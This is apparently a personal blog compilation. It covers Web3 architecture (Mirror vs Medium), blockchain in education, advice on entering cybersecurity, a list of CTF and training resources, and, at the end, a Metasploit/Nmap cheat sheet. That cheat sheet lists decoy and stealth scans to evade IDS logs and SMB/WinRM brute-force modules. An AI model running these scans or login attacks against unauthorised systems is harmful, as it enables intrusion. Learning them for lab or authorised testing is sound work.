(Note: Ethereum Name Service is Ethereum Name Service, which can provide readable name resolution services for blockchain addresses, Web3 storage resources, and even social information in a decentralized form, and is also the most widely integrated blockchain naming service. standard.)
Signature on-chain: The content after signature confirmation will be displayed at the bottom of the content page (as shown in the figure above) with three sets of data: “Arweave* Transaction ID”, “Contributor Ethereum Address*” and “Content Summary”. All information is publicly viewable on the blockchain, so anyone can verify whether an item of content was written by a specific Ethereum account. All published entries and every content change need to be signed by the user with a signature key, and then published to store data on Arweave. All published entries and every content change need to be signed by the user with a signature key, and then published to store data on Arweave.
(Note: Arweave is a decentralized cloud storage solution, which aims to use blockchain to subvert the traditional storage market. Different from other cloud storage solutions, Arweave not only has the security advantages of decentralized storage, users can also choose one time permanent storage service.Ethereum (Ethereum) is a decentralized open source public blockchain platform with smart contract functions.An Ethereum address represents an Ethereum account, and an address is an account For external accounts, the address represents the last 20 bytes of the account’s public key (usually starting with 0x, such as 0xcd2a3d9f938e13cd947ec05abc7fe734df8dd826, the address uses hexadecimal notation, once the content is sent to Ethereum will no longer be deleted and tampered with)
Compared with the architecture of Medium, Mirror is content-centric.
The browser obtains the content hash of the content based on the domain name system (ENS) of the blockchain, and then obtains the web application itself (Arweave) from a decentralized storage system. When the user interacts with the web page, the web page Instead of initiating an application like a specific server, there is no Google server, no medium server, but to a decentralized storage system, or indexer to read and write.
Let’s take a closer look at the difference between the two product architectures. *
Medium (Web2 product)
1. Front-end: For the web front-end, it usually refers to the front-end part of the website, including the presentation layer and structural layer of the website: the structure of the Web page, the visual appearance of the Web, and the interactive realization of the Web level.
Front-end code (usually written in JavaScript, HTML, and CSS) defines a product’s user interface logic. Such as what a Medium website looks like and what happens when a user interacts with some of the elements on the page (e.g. buttons, status bar, small icons, etc.).
2. Backend: The backend is more about interacting with the database to process the corresponding business logic. What needs to be considered is how to implement functions, data access, platform stability and performance, etc.
The backend code (written in languages ​​such as Node.js, Java, or Python) needs to have a very clear definition of the business logic of the Medium website. For example, when a new user signs up, publishes a new blog, or makes a comment on someone else’s blog, how does the website interact with the user.
3. Database: The website must have a database for storing network data, also known as data space.
Now most websites are dynamic websites developed by ASP and PHP, and website data is stored in a dedicated database. Website data can be directly published to the website database through the website background, and the website will call these data. To store user information, user uploads, tags, comments, likes, etc., the database needs to be constantly updated.
Take Medium as an example; the user tries to log in to Medium and upload content, the user enters the user name and password on the front end/client, and initiates an HTTP/HTTPS request (Request) to the back end/server. After receiving the request, the back end initiates a query to the database (Query ), check whether the user name and password are correct in the database, and return the result and other information of the user to the backend after the query is completed. After receiving the data, the backend initiates an HTTP/HTTPS request (Response) to the frontend. After receiving the request, the frontend rendered on the page. Appeal All of these codes are hosted on centralized servers and sent to users through Internet browsers.
Mirror (Web3 product)
1. Signature: The first difference of Web3 products is the front-end login method, users do not need to have a set of account and password system.
Similar to how Google allows users to access various applications without creating multiple accounts, crypto wallets can have a similar function in web3. Crypto wallet users can connect to the decentralized protocol at any time and start using it without submitting personal information or registering an account. Web3 applications do not need to call the database (web3 does not have such a centralized database) to read user data, because all user data is public on the chain. Users need to link a wallet (the web page is a browser extension, and the mobile terminal is a separate app), and sign a transaction to log in.
2. Front-end: The front-end user experience is not much different from Web2, but the front-end code is stored on a decentralized server.
3. Node management: Mirror runs on a decentralized network like Ethereum, and each node in the network keeps a copy of all states on the Ethereum state machine, including codes and data related to each smart contract. For the front end to communicate with the smart contract and make function calls, it needs to interact with one of the nodes.
This is because any node can broadcast a request to execute a transaction on the EVM (Ethereum Virtual Machine). Therefore, in addition to building a set of Ethereum full nodes by yourself, you can also use API services provided by third-party service providers to interact between the front end and smart contracts.
4. Virtual machine: The virtual machine is the core module in the Web3 architecture. Different from Web 2 applications, Web 3 has no background and database, and does not require a centralized web server to store back-end logic.
A virtual machine (Virtual Machine) simply refers to a code running environment built on a decentralized blockchain. At present, the mainstream ones on the market are the Ethereum Virtual Machine (Ethereum Virtual Machine, EVM) and the Ethereum-like virtual machine. Based on the Account model, it runs the smart contract code internally in a completely isolated manner from the outside, realizing a Turing-complete smart contract system. Ethereum requires thousands of people running a piece of software on their personal computers to power the network. Each node (computer) in the network is used to run the Ethereum virtual machine. Think of the EVM as an operating system that understands and executes software written in a specific programming language on Ethereum. EVM assumes the responsibility of database + backend within the Mirror product architecture, data is stored on the chain, and smart contracts process the data.
5. Smart contract: a program that executes code on the blockchain when certain conditions are met, and the parties approve and maintain its operation by digitally signing the contract.
The smart contract is actually the same piece of code stored in the blockchain (each node). This code defines the rules of the contract. When the input meets the required conditions, the smart contract code in each node will be automatically executed independently, and Automatically cross-check that all execution results are the same.
6. External storage: Because of the ledger synchronization property of the blockchain, the storage on the chain is very expensive, so most of the data that takes up space and is not the most important will be stored on a third-party decentralized storage platform such as IPFS/Swarm /Arweave.
Take Mirror as an example: the user connects to the wallet through the browser interface. Write an article, sign it through the wallet, and send the transaction to the chain. Articles will be sent to arweave through the background of mirror (currently mirror is helping users pay for uploading to arweave through a centralized account). The transaction containing the arweave transaction information is then uploaded to Ethereum for packaging.
During this period, the wallet will interact with the provider to connect to Ethereum, and Mirror’s own server will also send and query transactions through the provider and feed back to the front end.


By comparing the two products, Medium and Mirror, we can see that blockchain distributed storage provides a commercially feasible solution for information transparency and non-tampering from the technical level.

As an emerging concept, Web 3 is still in the early stages of development. From the architectural level, it is determined that a new set of infrastructure is required, including various products and services, from the underlying network stack to the consensus model or virtual machine.
Although there are also some challenges at the regulatory level, compared with Bitcoin, the narrative and positioning adopted by Web3 is very moderate in terms of political stance, and it is also more pragmatic and easy to be accepted by the mainstream.
Application of Blockchain Technology in Education and Other Sectors

Application of Blockchain Technology in Education and Other Sectors

Blockchain technology is regarded as another disruptive technology after cloud computing, Internet of things and big data, which has received high concern by the governments, financial institutions and the enterprises. Essentially, blockchain technology is a kind of technical scheme to maintain a reliable database by means of decentralization and high trust. Its core technologies include distributed accounting technology, asymmetric encryption algorithm and intelligent contract. Furthermore, it has the distinguished characteristics such as decentralization, consensus mechanism, traceability and high trust. Nowadays, as the underlying technology of bitcoin, #blockchaintechnology is not only applied in the field of finance, but also has great potential in education.

Application of Blockchain Technology in Education and Other Sectors

What’s more, blockchain technology is expected to play an important role in the construction of internet +education ecology to promote the reform of education system. According to the experience and enlightenment from the application of blockchain in the financial field, the blockchain in education is mainly embodied in six areas of application: establishing individual knowledge on big data, creating intelligent education platform, developing degree certificate system, constructing new ecology of open education resources, achieving “self-organization” operation of networking in learning communities and developing the decentralization of education system.

As seen:

  • In the financial field, global banking giants have formed the R3 Alliance, including more than 40 large international financial institutions such as HSBC, UBS, and Bank of America, to jointly develop blockchain technology. Nasdaq in the United States took the lead in launching Linq, a securities trading platform based on blockchain technology, which became an important milestone in the trend of decentralization in the financial securities market. Clearly, it is necessary to pay close attention to the impact of blockchain and other technologies on the financial sector.
  • In the field of technology, IBM and The Linux Foundation have established a dedicated blockchain open source project Hyperledger Fabric, which has entered the substantive development stage. The company will provide Watson API on the Watson IoT platform to help enterprise customers and developers develop and test IoT applications based on cloud computing, in order to realize the use of blockchain to lead the autonomy of the Internet of Things.
  • In the field of energy, foreign companies have launched energy blockchain projects, such as: Germany’s Siemens and New York’s new ventures have cooperated to apply blockchain technology to the microgrid power trading market; American energy company LO3 Energy and Bitcoin development company Consensus System Cooperated to build TranActiveGrid, an interactive grid platform based on blockchain system, for a small number of residents in the Gowanus and Park Slope neighborhoods of Brooklyn, New York.
  • In the field of food, a research report from the University of Saad in the United Kingdom pointed out that if the blockchain technology is applied to the food supply chain, by making the data of food transparent, it may reduce the phenomenon of food waste, thereby solving the problem of food waste. In addition, Walmart is also trying to use blockchain technology to record the source of food, trying to let consumers have more food information, so as to improve some of the current chaos in the food industry.
  • In the medical field, Philips Medical and Tierion have cooperated to allow Philips Medical to use blockchain technology to complete the authentication of medical records and the privacy protection of patients. Blockchain technology helps to solve the large-scale data quality problems that the medical industry is currently suffering from, and provides the medical industry with a unique source of authentic data, so that the system will no longer suffer from human errors or manual data reconciliation, thereby solving the problem of medical data trust.

Enlightenment on the application of blockchain in the field of education

The application of blockchain technology is bringing disruptive changes to the financial sector and creating new business opportunities. By studying the application mode of blockchain technology in the financial field, it is found that its value to the innovation and development of the financial field is mainly reflected in: eliminating intermediate trading platforms, reducing transaction costs; realizing real-time transaction settlement, improving transaction efficiency and asset utilization; distribution The transaction data is stored in a format, which cannot be tampered with and has high security; the automatic operation of the transaction process is realized based on the #smartcontract. The application scenarios and models of blockchain technology in the financial field provide the following enlightenment for its application in the education field:

(1) Strengthen the protection of intellectual property rights and build an educational trust system. The traceability of digital currency can reduce the bank’s expenditure on compliance verification and auditing such as anti-money laundering and anti-fraud, and effectively control the occurrence of illegal activities such as tax evasion and money laundering. In the field of education, the traceability of blockchain technology can be used to realize the copyright protection of educational assets and intellectual achievements, and solve the problem of intellectual property disputes from the source. In addition, digital currency storage on the blockchain has high security and reliability. In the field of education, important information such as student grades, personal files, and academic certificates can be stored on the blockchain to prevent information from being lost or maliciously tampered with. , build a safe, credible, and non-tamperable student credit system, and help solve the current problems of lack of student credit and global academic fraud.

(2) Optimize the educational business process to achieve efficient and low-cost educational resource transactions. In terms of cross-border payment, the blockchain uses the characteristics of decentralization to abandon the role of intermediary banks and realize point-to-point fast and low-cost cross-border payments. In terms of educational resource sharing, the use of distributed ledger technology to realize the direct connection between users and resources can simplify the operation process and improve the efficiency of resource sharing, so as to promote the open sharing of educational resources and solve the problem of resource islands. In terms of educational resource transactions, the use of decentralized features eliminates transaction intermediary platforms and realizes point-to-point connections between consumers and resources, thereby reducing expenses, simplifying operating procedures, and creating an efficient and low-cost educational resource transaction platform.

(3) Use the characteristics of decentralization to build a decentralized education system. Blockchain technology is applied to supply chain financial business. By eliminating intermediate transaction agencies and reducing human intervention, costs and operational risks are reduced. Wave has reached a cooperation agreement with Barclays Bank to put the letter of credit, bill of landing number and documents of the international trade process on the public chain, and conduct authentication and non-tamperable verification through the public chain, establishing completely transparent “rules of the game” to achieve verification Decentralization of rules. In the field of education, blockchain can be used to develop a decentralized education system, breaking the monopoly of traditional education services by schools or government agencies, so that any institution with educational qualifications can provide educational services and issue valid academic certificates. The effective integration of formal education and non-formal education promotes the reform of the education system for all people to participate in.

(4) Distributed storage and recording of credible learning data to achieve efficient connection between schools and enterprises. Blockchain technology makes the securities trading market more open, transparent, green, fair and efficient, turning the traditional model that was highly dependent on intermediaries into a decentralized flat network transaction model, and realizing distributed storage and recording of data. In the field of education, students’ personal information, academic performance, growth records and other content can be stored in a similar way, distributed in the education system, and can be shared with other schools or recruiting units on the basis of ensuring the authenticity and security of the information. Data content, as an important basis for student job interviews. Use distributed ledger technology to show employers their academic achievements and professional skills, build a bridge for communication between students and enterprises, and establish a new model of school-enterprise cooperation, so as to achieve efficient connection between students and employers.

(5) Develop educational smart contracts and build a new mode of network resources and platform operation. The smart contract technology in the blockchain can automate a large number of manual and semi-manual verification and management tasks in the current financial transaction process, and improve the intelligence of the transaction system. In the construction of open educational resources, using the transparency and automatic execution of smart contracts can realize the automatic execution of resource uploading, certification, transfer, sharing, etc., reduce the cost of resource sharing, improve the efficiency of resource sharing, and build a new form of network resource circulation . In addition, smart contracts can be used to build an efficient and intelligent online learning community, realize the “self-organization” operation of the learning community, monitor the ecological environment of the community in real time, automatically block and delete inappropriate speech, and create a positive community atmosphere.

Challenge of Using Blockchain in Education

Blockchain technology achieves the anonymity effect by isolating the connection between the transaction address and the real identity of the address holder, and prevents the disclosure of user privacy due to the transparency of transaction information. However, such protection can still be achieved by observing and tracking block information and user IDs. Track down the user’s personal information. Therefore, the application of blockchain technology in the field of education faces the risk of the privacy of teachers and students being leaked, mainly from the following two aspects: First, all transaction information is open and transparent, and any information can be tracked and queried, and then certain conclusions can be inferred. Or predict the status and behavior of teachers and students, which is not conducive to the protection of personal privacy of teachers and students; second, the security of the blockchain is guaranteed by algorithms. In theory, only more than 51% of node users are hacked at the same time. Data information however, with the development of mathematics, cryptography and computing technology, it is difficult to guarantee that the algorithm will not be cracked in the future, resulting in the leakage of teacher and student information.

Twitter: @jimmwayans | www.jimmwayans.com

How to be a Hacker

How to be a Hacker or a Cybersecurity Expert?

So you want to be a Hacker?

Recently I’ve been reading a ton of questions, posts and general discussion about getting into the ‘Information Security’ game, and in my opinion at least it’s typically followed up by a fair amount of misleading information. That might be a little harsh considering I’m sure it’s good intentioned, it’s also even possible that the advice worked for them (there is no one size fits all advice) but I thought I’d lay my thoughts out here in the hope of helping a new budding hacker or infosec enthusiast move forward.

I want to play sport, where should I start?
This vague, open ended and very ambiguous question is very similar to someone asking how they should go about getting into information security. The first thing to realize is, there is a huge range of information security fields, and within each of those huge fields, is a lifetime’s worth of learning content. Just like picking a sport there is no ‘best’, it’s simply sometimes area’s you may enjoy more than others. Off the top of my head here are some example area’s that is by no means exhaustive:

How to be a Hacker

How to be a Hacker

  • Web Application Security
  • Mobile Application Security
  • Reverse Engineering
  • Malware Reverse Engineering
  • Cloud Security
  • Network Security
  • Incident Response
  • Hardware Hacking
  • IoT Hacking
  • Risks, Governance and Compliance
  • Programming / Creating Tools for Others
  • Exploit Development
  • Forensics
  • etc…


Some of these are more of a technical nature while others are more of a theoretical focus. I guarantee that whatever you like there are others out there who will find it boring, just as you will with what others are interested in sometimes. Right now it’s expected that if you’re reading this you may know very little about any of these area’s but what’s important is your willingness to learn and what type of motivation you have.

The Hacking Type
One trademark that is almost universal of people throughout those fields is their focus on independent, self directed learning. Unfortunately in some ways security is still considered a ‘dark art’, I mean why would anyone want to know how to break into a computer system unless they were going to do so? As a result plenty of people will show disdain to outright hostility when asking about security related questions under the false (perhaps sometimes true) assumption it’s merely a ‘script kiddie’ looking to learn to hack systems instead of wanting to learn and use that knowledge for a good purpose. It’s also a fact that the ‘learning’ resources of information security are quite disjointed with no real central repository of learning material.

The point of highlighting this is that if you wish to prosper and successfully enter into the information security field you should be prepared to jump in and find your way without waiting for someone to hold your hand and lead you down the right path. Google some of the above terms and see what sounds like fun. Despite what sometimes seems like a constant battle to find the ‘best’ field to learn, or the ‘best’ resource, or the ‘best’ way to learn often more time is spent procrastinating wondering these questions rather than dedicating the time to actually learning. Look up video’s on youtube for hacking examples – it’s ok if you don’t know what a lot of it means, but write down a list then google those terms. Use points of interest to spawn out with an ever increasing web of knowledge around topics you’re interested in.

Do I need to learn X first?
Of course you need to have a full knowledge of the OSI layer before you begin. Yes you need to read that 1000 page book on the TCP protocol. Yes you need to be proficient in 5 programming languages (at least!) before you consider hacking. Can you compile your own Linux kernel from source code? No? Don’t bother learning hacking. Actually…. all that is full of rubbish, yet it’s one of the most common responses given to people looking to learn information security. There is one requirement to becoming a decent hacker – interest. The difference between a future hacker and a script kiddie isn’t knowledge, it’s the willingness to learn.

As long as you have a vague idea of how to use a computer you’re at the starting point you can work with. Yes if you don’t have a solid understanding of how TCP works you should have that on your to-do list to look up when someone is talking about it in a hacking tutorial – but it’s ridiculous to think you need a ton of prerequisite knowledge before you’re allowed to start learning about topic’s you’re interested in. When you’re looking up how that login puzzle works on a hacking site and it uses JavaScript you’re going to learn how JavaScript works. When you read through how a buffer overflow works and it has a Python template you’ll learn some basics of Python. No, you won’t get a job as a developer in those languages at the end of it but you’ll pick up the common way’s to break the language.

Informal Learning
“Ok, I get the hint – I need to learn things myself, but can you at least give me a starting point?”

Sure, there are a ton of great free or cheap resources out there to get started depending on what topic appeals to you. Here are some examples.

Web Application Security

  • HackThisSite – Good for some basic web based challenges (link)
  • Enigma Group – Similar to Hack this site (link)
  • Hack The Box – A massive, online cybersecurity training platform (link)
  • OWASP Top 10 – Idea of what are the most common vulnerabilities (link)
  • TryHackMe – a free online platform for learning cyber security (link)
  • OWASP Broken Wep Apps – A virtual computer you can load up to practice hacking skills on your network (link)
  • Pentesting Lab – Another web focused virtual machine (link)
  • In fact anything from vulnhub that interested you is good (link)
  • The Web Application Hackers Handbook – The book on web hacking and vulnerabilities (link)


Reverse Engineering / Malware Reversing

  • Lena’s Tutorials – Known as pretty much one of the best introductions to reverse engineering (link)
  • The Legends of Random – Again another solid set of tutorials for reverse engineering (link)
  • Reversing: Secrets of Reverse Engineering – A good book on the foundation’s of reverse engineering (link)
  • Practical Malware Analysis – A great book focusing on reversing malware (link)
  • Malware Analysts Cookbook – Another book focusing on reversing malware (link)


Network Security

  • Virtual Machines dominate this category as they allow you to practice against real machines. Head to vulnhub and download any VM that looks interesting (link)
  • Metasploit Unleashed – A solid run through of the metasploit testing framework to be used in conjunction against VM’s. (link)
  • The Basics of Hacking and Penetration Testing – A very basic look at penetration testing useful for those completely new to the field. (link)
  • Metasploit – The Penetration Testers Guide – Another book focusing around the use of metasploit in penetration testing (link)
  • Because this is such a huge field often it’s breaking it down into one aspect, then researching that aspect specifically. Blogs are your best friend here. (link)


Exploit Development

  • Corelan – This is by far the best resource out there for learning about exploit development. (link)
  • FuzzySecurity – Another good learning resource with some tutorials available (link)
  • Exploit-DB – One of the best things you can do is find examples of exploits (often with apps attached) and try and replicate the exploit independently (link)
  • Hacking – The Art of Exploitation – A fantastic book that covers ton’s of different exploitation techniques (link)
  • The Shellcoders Handbook – Another fantastic book on exploit development and shellcoding (link)

Other than that, Google, Google, and some more Google. I’ve left off some area’s such as forensics and compliance because personally I’m not interested in them so I haven’t gone looking for resources, I’m sure there are some fantastic ones out there.

Formal Learning
Outside of the free resources you can also begin to get certificates to make yourself more appealing to employers if you wish to transition into the field as more of a career path. Some certification’s I’d highly recommend would be the “Penetration Testing with Kali Linux” course from Offensive Security (link) if you’re interested in network security. It’s easily one of the best learning experiences I’ve ever had in the field and taught me more in 60 days than I’d learnt in a year on my own. Their “Cracking the Perimeter” is also a great course, focusing a little more on exploit development (link).

If you’re looking at developing your programming skills things like SecurityTube’s “Python for Pentesters and Hackers” (link) is a great foundation that will teach you how to do plenty of nifty things like building your own port scanners, password crackers etc. I don’t place a huge value into their certification’s that they offer from an employment perspective, but I’d look at it more as a consolidated lump of knowledge and examples for sale which can still be valuable.

The “Certified Ethical Hacker” course is another commonly mentioned. Honestly it’s typically looked down upon so I don’t think it’s necessarily worth the money – but if you need a formal course to learn things then it might be worth the money to you. A lot of these certifications and their value are discussed over at TheEthicalHacker.net’s forums located here.

“Just seeing if you can”
Hacking is all about gaining access to things that we’re not meant to. Creating an exploit, finding a SQL injection, Password Cracking it’s all designed to put us towards the goal of taking control of the box we’re attacking. I guarantee almost every new hacker has started dreaming about “Just seeing if they can” get access to that school website. “Just seeing if they can” gain access to the neighbors WiFi network. Sending their friend a trojan virus “just to see if they can” take control. Worse still you might end up visiting places like HackForums.net and seeing a lot of people trying to infect others with RATs, build botnet’s etc under the impression this is hacking, or sadly that this is the only way you can learn.

I need to emphasize that this is not the case. Any type of “just seeing if you can” type exercises can be replicated through the use of virtual machines, your own routers or even capture the flag / wargame competitions out there. Being realistic even if you can access another person’s machine, what are you going to do with it? Are you really going to try and steal credit card details and make fraudulent transactions? Are you really going to steal passwords and be paranoid that your activity is going to be traced back to you for the sake of peeking at someone’s emails? There have been plenty of examples of newbies being charged, not realizing the seriousness of the crimes they are committing. If you went for a job with the FBI and they had a look through your post history would you like them to read that post about you asking how to host a botnet? It’s a classic example of what’s on the internet is forever, and if you really want a career in information security you need that clean record to obtain any security clearances you’re going to need to do your job. Getting caught for stupid stuff just isn’t worth it.

So after a long ramble, what’s the key points?

  • A hacker will actively seek out information, not wait for others to give it to him
  • The difference between a script kiddie and a new hacker is the desire to learn
  • You need to experiment with a wide range of information security fields to find what interests you
  • Don’t let anyone tell you that there are prerequisites for learning information security, there isn’t.
  • It’s not worth “just seeing if you can” do anything that isn’t legal, the risk vs reward makes no sense for doing so
  • With courses, wargames, capture the flags and more importantly virtual machines there is no hacking scenario that can’t be replicated legally

Have fun, sorry if it got preachy towards the end and enjoy pwning boxes! Information security is an awesome field and you’ll be learning something new every day that you’re involved in it. There is no right answer for getting into the field apart from jumping into it with both feet. Get wet, learn to tread water and stay afloat, one day you might even be able to swim a little!

Find me on twitter @jimmwayans


Information/Cyber Security Cheat Sheet


This is a recollection of links and resources I have found / been told about over the years. I developed this post in the hope to map out good resources in the industry, facilitating the spread of knowledge, no matter the skill level.

If any errors are spotted, or any links need adding / updating / removing. Please contact me via Twitter @jimmwayans (https://twitter.com/jimmwayans).

CTF Site Links

The King Of CTF Pages – https://ctftime.org/
247CTF – https://247ctf.com
HackTheBox – https://hackthebox.eu/
RootMe – https://root-me.org/
0x0539 – https://0x0539.net/
Laptop Hacking Coffee – https://ctf.laptophackingcoffee.org/
pwnable tw – http://pwnable.tw/ (Only BinExp)
pwnable kr – http://pwnable.kr/ (Only BinExp)
PicoCTF – https://picoctf.com/ (Beginner friendly)
reversing kr – http://reversing.kr/
The Stereotyped Challenges – https://chall.stypr.com/
SDSLabs CTF – https://backdoor.sdslabs.co/

Payload Cheat Sheets

PayloadsAllTheThings – https://github.com/swisskyrepo/PayloadsAllTheThings
BurpSuite XSS Cheat Sheet – https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

OSCP Preparation

Sam’s Review / Guide – https://coffeejunkie.me/OSCP-Exam-Overview/
R4J Buffer Overflow – https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
Computerphile BoF Explanation – https://www.youtube.com/watch?v=1S0aBV-Waeo
g0tm1lk Linux Priv Esc Cheat Sheet – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Windows Priv Esc – https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows Priv Esc (built around OSCP) – https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

SAST Practice Pages

Secure Code Warrior – https://securecodewarrior.com/
ExploitDB (May require imagination) – https://www.exploit-db.com/

All Around Practical Learning (non-competitive)

OWASP Juice Shop – https://owasp.org/www-project-juice-shop/
Pentester Labs – https://pentesterlab.com/
OverTheWire – https://overthewire.org/ (Beginner friendly)
Pentester Academy – https://www.pentesteracademy.com/
PortSwigger Labs – https://portswigger.net/web-security
OverTheWire – http://www.overthewire.org/
CTFLearn – http://ctflearn.com/
VulnHub – http://vulnhub.com/
Hacker101 – https://www.hacker101.com/
OSINTme – https://osintme.com/

All Around Theory Learning (non-competitive)

OWASP – https://owasp.org/
BurpSuite Research – https://portswigger.net/research
HumbleBundle Cyber Security Books – https://www.humblebundle.com/books/cybersecurity-2020-wiley-books?hmb_source=navbar&hmb_medium=product_tile&hmb_campaign=tile_index_4
Free SANS courses for the fundamentals – https://www.cyberaces.org/courses.html

Relevant Blogs / Podcasts

Security Weekly – https://securityweekly.com/category-shows/application-security-weekly/
Darknet Diaries – https://darknetdiaries.com/
TheManyHatsClub – https://themanyhats.club/
0x00Sec (Community Blog) – https://0x00sec.org/
Secret Club – https://secret.club/
g0tm1lk – https://blog.g0tmi1k.com/
Cybering – https://cybering.cc/

Twitch Hacking Channels (English)

TheBlindHacker – https://www.twitch.tv/theblindhacker
GeoHotz – https://www.twitch.tv/georgehotz
LiveOverflow – https://www.twitch.tv/LiveOverflow

Twitch Hacking Channels (Spanish)

S4vitar – https://www.twitch.tv/s4vitaar

Youtube Channels Pentesting (English)

HackerSploit – https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q
IppSec – https://youtube.com/ippsec
TheCyberMentor – https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw
LiveOverflow – https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
Computerphile – https://www.youtube.com/user/Computerphile

Relevant Discord Servers and Communities

TheManyHatsClub – https://discord.gg/infosec
ThugCrowd – https://thugcrowd.com/
LaptopHackingCoffee – https://laptophackingcoffee.org/doku.php?id=start
HackTheBox – https://discord.gg/hRXnCFA
0x00Sec – https://discord.gg/PHM9Wak (https://0x00sec.org)
John Hammond Discord – https://discord.gg/Kgtnfw4
ReSwitched – https://discordapp.com/invite/ZdqEhed
ur-hackr – https://ur-hackr.com/

Companies Offering Certificates

ELearnSecurity – https://elearnsecurity.com/
Pentester Academy – https://www.pentesteracademy.com/
Offensive Security – https://www.offensive-security.com/
HackTheBox – https://hackthebox.eu/

The Cybrary – https://www.cybrary.it/
CyberFirst – https://www.ncsc.gov.uk/cyberfirst/
Mind Map Everything – https://www.amanhardikar.com/mindmaps.html
Events around London – https://medium.com/@securestep9/cybersecurity-infosec-appsec-meetups-events-in-london-3688c4a42ea6
Razvi’s List of Hacking Sites – https://razvioverflow.github.io/starthacking
Peerlyst – https://www.peerlyst.com/
CTFs for beginners – https://twitter.com/JenF3rr_/status/1208577793359003648
HackerOne Bugbounty page – https://hackerone.com/
Using Twitter for InfoSec – https://dev.to/vickilanger/that-s-it-that-s-the-tweet-send-3e0h
CVE feed from the mitre – https://cve.mitre.org/

nmap scanning

Active Information Gathering with Metasploit-Framework

Using Nmap to perform port scanning

Using -sT scanning mode is the default scanning mode of Nmap. The status of the target port is accurately judged through the TCP three-way handshake packet. Since three connections are established, it is extremely easy to be captured by the target firewall.

msf> nmap -sT 

The -sS scan mode does not perform three-way handshake, it is called semi-open scan, also known as stealth scan. Compared to TCP scanning, it is faster and more secure.

msf> nmap -sS

The –sU scan mode is the fastest scan method, because UDP only sends and receives, but there may be some errors between the scan results and the above two scan methods.

msf> nmap -sU

Operating system identification.
Nmap can identify the target operating system in two ways:

1. The commonly used -O parameter, the -O parameter is an advanced parameter provided by Nmap, which is usually used alone.

msf> nmap -O

2. The -sV parameter can be used together with the above port scan parameters, and nmap will add the identification result of the system version at the end of the scan result.

msf> nmap -sSV

Nmap security scan

Usually, the scan initiated on the target site or host will be recorded by the WAF or IDS, which is extremely insecure for the tester, so the intrusive and deceptive scans are hidden from the tester. IP information is necessary, Nmap provides the -D advanced parameter, if you provide 2 IP addresses, then Nmap will leave 3 IP addresses in the WAF log to confuse the audience and ensure the test as much as possible the safety of the user.

msf> nmap -sS -D, 

1. TCP port scan

msf> use auxiliary/scanner/portscan/tcp 

2. SYN port scan

msf> use auxiliary/scanner/portscan/syn

3. Call nmap

In metasploit-framework use db_nmap to do a complete banner grabbing, use the following command:

msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all -p - 22

The -Pn parameter tells Nmap that the target site has been determined to be online, no further detection is required, and the detection process of whether it is online or not is skipped. -sTV means to scan in TCP mode, and to determine the banner information and version of each port at the same time. The port, the –min-parallelism parameter executes a minimum number of 64 parallelisms, the –version-all parameter indicates that all probes of nmap are used to identify the service details, and the -p parameter is set to – indicates that all ports of the target are scanned.

4. Use ARP for live host scanning

msf> use auxiliary/scanner/discovery/arp_sweep  set RHOST   set THREADS 10  run

5. Use UDP to detect live hosts

msf> use auxiliary/scanner/discovery/udp_sweep  set RHOST   set THREADS 10  run

6. Use SMB to detect live hosts

msf> use auxiliary/scanner/smb/smb_enumshares   set RHOSTS   set THREADS 10  run

7. SMB version scan

msf> use auxiliary/scanner/smb/smb_version 

8. SMB brute force (dictionary required)

msf> use auxiliary/scanner/smb/smb_login

9. SSH version scan

msf> use auxiliary/scanner/ssh/ssh_version

10. FTP version scan

msf> use auxiliary/scanner/ftp/ftp_version

11. SMTP enumeration

msf> use auxiliary/scanner/smtp/smtp_enum

12. SNMP login

msf> use auxiliary/scanner/snmp/snmp_enum

13. SNMP login

msf> use auxiliary/scanner/snmp/snmp_login

14. WinRM scan

msf> use auxiliary/scanner/winrm/winrm_auth_methods

15. WinRM brute force cracking

msf> use auxiliary/scanner/winrm/winrm_cmd
× Need my services?